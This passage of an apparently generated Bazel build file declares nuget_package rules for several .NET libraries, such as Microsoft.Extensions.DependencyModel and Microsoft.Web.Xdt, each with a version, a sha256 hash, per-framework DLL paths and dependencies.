)
nuget_package(
name = "system.runtime.interopservices.runtimeinformation",
package = "system.runtime.interopservices.runtimeinformation",
version = "4.0.0",
sha256 = "e63e776a66fbe80dd23e21370749654f65cfc74e7cf82804ece5cbe1b2da953e",
core_ref = {
"netcoreapp2.0": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netcoreapp2.1": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netcoreapp3.0": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netcoreapp3.1": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
},
net_lib = {
"net45": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net451": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net452": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net46": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net461": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net462": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net47": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net471": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net472": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net48": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
},
net_ref = {
"net45": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net451": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net452": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net46": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net461": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net462": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net47": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net471": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net472": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net48": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard1.1": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard1.2": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard1.3": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard1.4": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard1.5": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard1.6": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard2.0": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard2.1": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
},
mono_lib = "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
mono_ref = "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
net_files = {
"net45": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net451": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net452": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net46": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net461": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net462": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net47": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net471": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net472": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net48": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
},
mono_files = [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
)
nuget_package(
name = "microsoft.extensions.dependencymodel",
package = "microsoft.extensions.dependencymodel",
version = "3.1.3",
sha256 = "e2ef26cd9c49f82084e9c8a64082478253fad280fa0c736af4cb94bf5315d428",
core_lib = {
"netcoreapp2.0": "lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"netcoreapp2.1": "lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"netcoreapp3.0": "lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"netcoreapp3.1": "lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
},
net_lib = {
"net451": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net452": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net46": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net461": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net462": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net47": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net471": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net472": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net48": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"netstandard1.3": "lib/netstandard1.3/Microsoft.Extensions.DependencyModel.dll",
"netstandard1.4": "lib/netstandard1.3/Microsoft.Extensions.DependencyModel.dll",
"netstandard1.5": "lib/netstandard1.3/Microsoft.Extensions.DependencyModel.dll",
"netstandard1.6": "lib/netstandard1.6/Microsoft.Extensions.DependencyModel.dll",
"netstandard2.0": "lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"netstandard2.1": "lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
},
mono_lib = "lib/net451/Microsoft.Extensions.DependencyModel.dll",
net_deps = {
"net451": [
"@newtonsoft.json//:net451_net",
"@system.runtime.interopservices.runtimeinformation//:net451_net",
],
"net452": [
"@newtonsoft.json//:net452_net",
"@system.runtime.interopservices.runtimeinformation//:net452_net",
],
"net46": [
"@newtonsoft.json//:net46_net",
"@system.runtime.interopservices.runtimeinformation//:net46_net",
],
"net461": [
"@newtonsoft.json//:net461_net",
"@system.runtime.interopservices.runtimeinformation//:net461_net",
],
"net462": [
"@newtonsoft.json//:net462_net",
"@system.runtime.interopservices.runtimeinformation//:net462_net",
],
"net47": [
"@newtonsoft.json//:net47_net",
"@system.runtime.interopservices.runtimeinformation//:net47_net",
],
"net471": [
"@newtonsoft.json//:net471_net",
"@system.runtime.interopservices.runtimeinformation//:net471_net",
],
"net472": [
"@newtonsoft.json//:net472_net",
"@system.runtime.interopservices.runtimeinformation//:net472_net",
],
"net48": [
"@newtonsoft.json//:net48_net",
"@system.runtime.interopservices.runtimeinformation//:net48_net",
],
"netstandard1.3": [
"@newtonsoft.json//:netstandard1.3_net",
"@system.runtime.interopservices.runtimeinformation//:netstandard1.3_net",
],
"netstandard1.4": [
"@newtonsoft.json//:netstandard1.4_net",
"@system.runtime.interopservices.runtimeinformation//:netstandard1.4_net",
],
"netstandard1.5": [
"@newtonsoft.json//:netstandard1.5_net",
"@system.runtime.interopservices.runtimeinformation//:netstandard1.5_net",
],
"netstandard1.6": [
"@newtonsoft.json//:netstandard1.6_net",
"@system.runtime.interopservices.runtimeinformation//:netstandard1.6_net",
],
},
mono_deps = [
"@newtonsoft.json//:mono",
"@system.runtime.interopservices.runtimeinformation//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.xml",
],
"netcoreapp2.1": [
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.xml",
],
"netcoreapp3.0": [
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.xml",
],
"netcoreapp3.1": [
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.xml",
],
},
net_files = {
"net451": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net452": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net46": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net461": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net462": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net47": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net471": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net472": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net48": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"netstandard1.3": [
"lib/netstandard1.3/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard1.3/Microsoft.Extensions.DependencyModel.xml",
],
"netstandard1.4": [
"lib/netstandard1.3/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard1.3/Microsoft.Extensions.DependencyModel.xml",
],
"netstandard1.5": [
"lib/netstandard1.3/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard1.3/Microsoft.Extensions.DependencyModel.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard1.6/Microsoft.Extensions.DependencyModel.xml",
],
"netstandard2.0": [
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.xml",
],
"netstandard2.1": [
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.xml",
],
},
mono_files = [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
)
nuget_package(
name = "microsoft.extensions.primitives",
package = "microsoft.extensions.primitives",
version = "3.1.3",
sha256 = "7b77cdb2f39328637eb66bf0982c07badc01c655c9f14e7185cc494b455d154b",
core_lib = {
"netcoreapp2.0": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"netcoreapp2.1": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"netcoreapp3.0": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"netcoreapp3.1": "lib/netcoreapp3.1/Microsoft.Extensions.Primitives.dll",
},
net_lib = {
"net461": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"net462": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"net47": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"net471": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"net472": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"net48": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"netstandard2.0": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"netstandard2.1": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
},
mono_lib = "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
mono_deps = [
"@system.memory//:mono",
"@system.runtime.compilerservices.unsafe//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"netcoreapp2.1": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"netcoreapp3.0": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"netcoreapp3.1": [
"lib/netcoreapp3.1/Microsoft.Extensions.Primitives.dll",
"lib/netcoreapp3.1/Microsoft.Extensions.Primitives.xml",
],
},
net_files = {
"net461": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"net462": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"net47": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"net471": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"net472": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"net48": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"netstandard2.0": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"netstandard2.1": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
},
mono_files = [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
)
nuget_package(
name = "system.componentmodel.composition",
package = "system.componentmodel.composition",
version = "4.7.0",
sha256 = "8f5ad0e2eb72a2530ddc140c48d7f7046634d202f93e9d41bbfaf225991bec11",
core_lib = {
"netcoreapp2.0": "lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
"netcoreapp2.1": "lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
"netcoreapp3.0": "lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
"netcoreapp3.1": "lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
},
core_ref = {
"netcoreapp2.0": "ref/netstandard2.0/System.ComponentModel.Composition.dll",
"netcoreapp2.1": "ref/netstandard2.0/System.ComponentModel.Composition.dll",
"netcoreapp3.0": "ref/netstandard2.0/System.ComponentModel.Composition.dll",
"netcoreapp3.1": "ref/netstandard2.0/System.ComponentModel.Composition.dll",
},
net_lib = {
"netstandard2.0": "lib/netstandard2.0/System.ComponentModel.Composition.dll",
"netstandard2.1": "lib/netstandard2.0/System.ComponentModel.Composition.dll",
},
net_ref = {
"netstandard2.0": "ref/netstandard2.0/System.ComponentModel.Composition.dll",
"netstandard2.1": "ref/netstandard2.0/System.ComponentModel.Composition.dll",
},
core_files = {
"netcoreapp2.0": [
"lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
"lib/netcoreapp2.0/System.ComponentModel.Composition.xml",
],
"netcoreapp2.1": [
"lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
"lib/netcoreapp2.0/System.ComponentModel.Composition.xml",
],
"netcoreapp3.0": [
"lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
"lib/netcoreapp2.0/System.ComponentModel.Composition.xml",
],
"netcoreapp3.1": [
"lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
"lib/netcoreapp2.0/System.ComponentModel.Composition.xml",
],
},
net_files = {
"netstandard2.0": [
"lib/netstandard2.0/System.ComponentModel.Composition.dll",
"lib/netstandard2.0/System.ComponentModel.Composition.xml",
],
"netstandard2.1": [
"lib/netstandard2.0/System.ComponentModel.Composition.dll",
"lib/netstandard2.0/System.ComponentModel.Composition.xml",
],
},
)
nuget_package(
name = "microsoft.web.xdt",
package = "microsoft.web.xdt",
version = "3.0.0",
sha256 = "161152cd56e0b6d602b6ba9470854537654a184cf52790c8f08cd107817371a1",
core_lib = {
"netcoreapp2.0": "lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"netcoreapp2.1": "lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"netcoreapp3.0": "lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"netcoreapp3.1": "lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
},
net_lib = {
"net45": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net451": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net452": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net46": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net461": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net462": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net47": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net471": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net472": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net48": "lib/net40/Microsoft.Web.XmlTransform.dll",
"netstandard2.0": "lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"netstandard2.1": "lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
},
mono_lib = "lib/net40/Microsoft.Web.XmlTransform.dll",
core_files = {
"netcoreapp2.0": [
"lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"lib/netstandard2.0/Microsoft.Web.XmlTransform.pdb",
],
"netcoreapp2.1": [
"lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"lib/netstandard2.0/Microsoft.Web.XmlTransform.pdb",
],
"netcoreapp3.0": [
"lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"lib/netstandard2.0/Microsoft.Web.XmlTransform.pdb",
],
"netcoreapp3.1": [
"lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"lib/netstandard2.0/Microsoft.Web.XmlTransform.pdb",
],
},
net_files = {
"net45": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net451": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net452": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net46": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net461": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net462": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net47": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net471": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net472": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net48": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"netstandard2.0": [
"lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"lib/netstandard2.0/Microsoft.Web.XmlTransform.pdb",
],
"netstandard2.1": [
"lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"lib/netstandard2.0/Microsoft.Web.XmlTransform.pdb",
],
},
mono_files = [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
)
nuget_package(
name = "microsoft.dotnet.internalabstractions",
package = "microsoft.dotnet.internalabstractions",
version = "1.0.0",
sha256 = "1d7de23971fbe48d4bede3628426cc3430e9728b5f6697d051da9d45318ce856",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netcoreapp2.1": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netcoreapp3.0": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netcoreapp3.1": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
},
net_lib = {
"net451": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net452": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net46": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net461": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net462": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net47": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net471": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net472": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net48": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"netstandard1.3": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netstandard1.4": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netstandard1.5": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netstandard1.6": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netstandard2.0": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netstandard2.1": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
},
mono_lib = "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
core_deps = {
"netcoreapp2.0": [
"@system.runtime.interopservices.runtimeinformation//:netcoreapp2.0_core",
],
"netcoreapp2.1": [
"@system.runtime.interopservices.runtimeinformation//:netcoreapp2.1_core",
],
"netcoreapp3.0": [
"@system.runtime.interopservices.runtimeinformation//:netcoreapp3.0_core",
],
"netcoreapp3.1": [
"@system.runtime.interopservices.runtimeinformation//:netcoreapp3.1_core",
],
},
net_deps = {
"netstandard1.3": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.3_net",
],
"netstandard1.4": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.4_net",
],
"netstandard1.5": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.5_net",
],
"netstandard1.6": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.6_net",
],
"netstandard2.0": [
"@system.runtime.interopservices.runtimeinformation//:netstandard2.0_net",
],
"netstandard2.1": [
"@system.runtime.interopservices.runtimeinformation//:netstandard2.1_net",
],
},
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netcoreapp2.1": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netcoreapp3.0": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netcoreapp3.1": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
},
net_files = {
"net451": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net452": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net46": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net461": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net462": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net47": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net471": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net472": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net48": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"netstandard1.3": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netstandard1.4": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netstandard1.5": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netstandard1.6": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netstandard2.0": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netstandard2.1": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
},
mono_files = [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
)
nuget_package(
name = "microsoft.dotnet.platformabstractions",
package = "microsoft.dotnet.platformabstractions",
version = "3.1.3",
sha256 = "5f9cdf209694bfe719b7c6fbc130c47743f2fd98cc8c81901a2667311137414d",
core_lib = {
"netcoreapp2.0": "lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"netcoreapp2.1": "lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"netcoreapp3.0": "lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"netcoreapp3.1": "lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
},
net_lib = {
"net45": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net451": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net452": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net46": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net461": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net462": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net47": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net471": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net472": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net48": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"netstandard1.3": "lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
"netstandard1.4": "lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
"netstandard1.5": "lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
"netstandard1.6": "lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
"netstandard2.0": "lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"netstandard2.1": "lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
},
mono_lib = "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
net_deps = {
"net45": [
"@system.runtime.interopservices.runtimeinformation//:net45_net",
],
"net451": [
"@system.runtime.interopservices.runtimeinformation//:net451_net",
],
"net452": [
"@system.runtime.interopservices.runtimeinformation//:net452_net",
],
"net46": [
"@system.runtime.interopservices.runtimeinformation//:net46_net",
],
"net461": [
"@system.runtime.interopservices.runtimeinformation//:net461_net",
],
"net462": [
"@system.runtime.interopservices.runtimeinformation//:net462_net",
],
"net47": [
"@system.runtime.interopservices.runtimeinformation//:net47_net",
],
"net471": [
"@system.runtime.interopservices.runtimeinformation//:net471_net",
],
"net472": [
"@system.runtime.interopservices.runtimeinformation//:net472_net",
],
"net48": [
"@system.runtime.interopservices.runtimeinformation//:net48_net",
],
"netstandard1.3": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.3_net",
],
"netstandard1.4": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.4_net",
],
"netstandard1.5": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.5_net",
],
"netstandard1.6": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.6_net",
],
},
mono_deps = [
"@system.runtime.interopservices.runtimeinformation//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netcoreapp2.1": [
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netcoreapp3.0": [
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netcoreapp3.1": [
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.xml",
],
},
net_files = {
"net45": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net451": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net452": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net46": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net461": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net462": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net47": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net471": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net472": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net48": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netstandard1.3": [
"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
